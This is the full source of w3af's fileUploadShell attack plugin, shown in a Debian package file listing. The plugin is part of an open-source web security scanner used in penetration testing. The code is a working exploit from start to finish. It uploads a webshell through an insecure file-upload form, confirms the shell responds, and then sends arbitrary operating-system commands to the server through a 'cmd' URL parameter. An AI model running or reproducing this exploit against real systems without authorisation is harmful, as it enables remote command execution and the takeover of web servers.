/usr/share/w3af/plugins/attack/fileUploadShell.py is in w3af-console 1.0-rc3svn3489-1.
This file is owned by root:root, with mode 0o644.
The actual contents of the file can be viewed below.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 | '''
fileUploadShell.py
Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
from core.data.fuzzer.fuzzer import createRandAlNum
import core.controllers.outputManager as om
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
import core.data.kb.knowledgeBase as kb
import core.data.kb.vuln as vuln
from core.data.kb.shell import shell as shell
import core.data.parsers.urlParser as urlParser
from core.controllers.w3afException import w3afException
import plugins.attack.payloads.payloads as payloads
import os
import os.path
import urllib
import tempfile
from core.controllers.misc.temp_dir import get_temp_dir
class fileUploadShell(baseAttackPlugin):
'''
Exploit applications that allow unrestricted file uploads inside the webroot.
@author: Andres Riancho ( andres.riancho@gmail.com )
'''
def __init__(self):
baseAttackPlugin.__init__(self)
# Internal variables
self._path_name = ''
self._file_name = ''
# User configured variables ( for fastExploit )
self._url = ''
self._method = 'POST'
self._data = ''
self._fileVars = ''
self._fileDest = ''
def fastExploit( self ):
'''
Exploits a web app with file upload vuln.
'''
if self._url == '' or self._fileVars == '' or self._fileDest == '' :
om.out.error('You have to configure the plugin parameters.')
else:
v = vuln.vuln()
v.setURL( self._url )
v.setMethod( self._method )
v.setDc( self._data )
v['fileVars'] = self._fileVars
v['fileDest'] = self._fileDest
kb.kb.append( 'fileUpload', 'fileUpload', v )
def getAttackType(self):
'''
@return: The type of exploit, SHELL, PROXY, etc.
'''
return 'shell'
def getVulnName2Exploit( self ):
'''
This method should return the vulnerability name (as saved in the kb) to exploit.
For example, if the audit.osCommanding plugin finds an vuln, and saves it as:
kb.kb.append( 'osCommanding' , 'osCommanding', vuln )
Then the exploit plugin that exploits osCommanding ( attack.osCommandingShell ) should
return 'osCommanding' in this method.
'''
return 'fileUpload'
def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit.
@return: True is a shell object based on the param vuln was created ok.
'''
# Check if we really can execute commands on the remote server
if self._verifyVuln( vuln_obj ):
# Set shell parameters
shell_obj = fuShell( vuln_obj )
shell_obj.setUrlOpener( self._urlOpener )
shell_obj.setExploitURL( self._exploit )
return shell_obj
else:
return None
def _verifyVuln( self, vuln_obj ):
'''
This command verifies a vuln. This is really hard work! :P
@parameter vuln_obj: The vuln to exploit.
@return : True if vuln can be exploited.
'''
# The vuln was saved to the kb as a vuln object
url = vuln_obj.getURL()
method = vuln_obj.getMethod()
exploit_dc = vuln_obj.getDc()
# Create a file that will be uploaded
extension = urlParser.getExtension( url )
fname = self._create_file( extension )
file_handler = open( fname , "r")
# If there are files,
if 'fileVars' in vuln_obj:
#
# Upload the file
#
for file_var_name in vuln_obj['fileVars']:
# the [0] was added here to support repeated parameter names
exploit_dc[file_var_name][0] = file_handler
http_method = getattr( self._urlOpener, method)
response = http_method( vuln_obj.getURL() , exploit_dc )
# Call the uploaded script with an empty value in cmd parameter
# this will return the payloads.SHELL_IDENTIFIER if success
dst = vuln_obj['fileDest']
self._exploit = urlParser.getDomainPath( dst ) + self._file_name + '?cmd='
response = self._urlOpener.GET( self._exploit )
# Clean-up
file_handler.close()
os.remove( self._path_name )
if payloads.SHELL_IDENTIFIER in response.getBody():
return True
# If we got here, there is nothing positive to report ;)
return False
def _create_file( self, extension ):
'''
Create a file with a webshell as content.
@return: Name of the file that was created.
'''
# Get content
file_content, real_extension = payloads.get_webshells( extension, forceExtension=True )[0]
if extension == '':
extension = real_extension
# Open target
temp_dir = get_temp_dir()
low_level_fd, self._path_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + extension, dir=temp_dir)
file_handler = os.fdopen(low_level_fd, "w+b")
# Write content to target
file_handler.write(file_content)
file_handler.close()
_path, self._file_name = os.path.split(self._path_name)
return self._path_name
def getOptions( self ):
'''
@return: A list of option objects for this plugin.
'''
d1 = 'URL to exploit with fastExploit()'
o1 = option('url', self._url, d1, 'string')
d2 = 'Method to use with fastExploit()'
o2 = option('method', self._method, d2, 'string')
d3 = 'Data to send with fastExploit()'
o3 = option('data', self._data, d3, 'string')
d4 = 'The variable in data that holds the file content. Only used in fastExploit()'
o4 = option('fileVars', self._fileVars, d4, 'string')
d5 = 'The URI of the uploaded file. Only used with fastExploit()'
o5 = option('fileDest', self._fileDest, d5, 'string')
ol = optionList()
ol.add(o1)
ol.add(o2)
ol.add(o3)
ol.add(o4)
ol.add(o5)
return ol
def setOptions( self, optionsMap ):
'''
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter OptionList: A dictionary with the options for the plugin.
@return: No value is returned.
'''
self._url = optionsMap['url'].getValue()
self._method = optionsMap['method'].getValue()
self._data = urlParser.getQueryString( optionsMap['data'].getValue() )
self._fileVars = optionsMap['fileVars'].getValue()
self._fileDest = optionsMap['fileDest'].getValue()
def getPluginDeps( self ):
'''
@return: A list with the names of the plugins that should be runned before the
current one.
'''
return ['discovery.serverHeader']
def getRootProbability( self ):
'''
@return: This method returns the probability of getting a root shell using this attack plugin.
This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones.
This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS
return a root shell.
'''
return 0.8
def getLongDesc( self ):
'''
@return: A DETAILED description of the plugin functions and features.
'''
return '''
This plugin exploits insecure file uploads and returns a shell. It's rather simple, using a form
the plugin uploads the corresponding webshell ( php, asp, etc. ) verifies that the shell is working, and if
everything is working as expected the user can start typing commands.
No configurable parameters exist.
'''
class fuShell(shell):
def setExploitURL( self, eu ):
self._exploit = eu
def getExploitURL( self ):
return self._exploit
def _rexec( self, command ):
'''
This method is called when a command is being sent to the remote server.
This is a NON-interactive shell.
@parameter command: The command to send ( ie. "ls", "whoami", etc ).
@return: The result of the command.
'''
to_send = self.getExploitURL() + urllib.quote_plus( command )
response = self._urlOpener.GET( to_send )
return response.getBody()
def end( self ):
om.out.debug('File upload shell is going to delete the webshell that was uploaded before.')
file_to_del = urlParser.getFileName( self.getExploitURL() )
try:
self.removeFile(file_to_del)
except w3afException, e:
om.out.error('File upload shell cleanup failed with exception: ' + str(e) )
else:
om.out.debug('File upload shell cleanup complete; successfully removed file: "' + file_to_del + '"')
def getName( self ):
return 'fileUploadShell'
|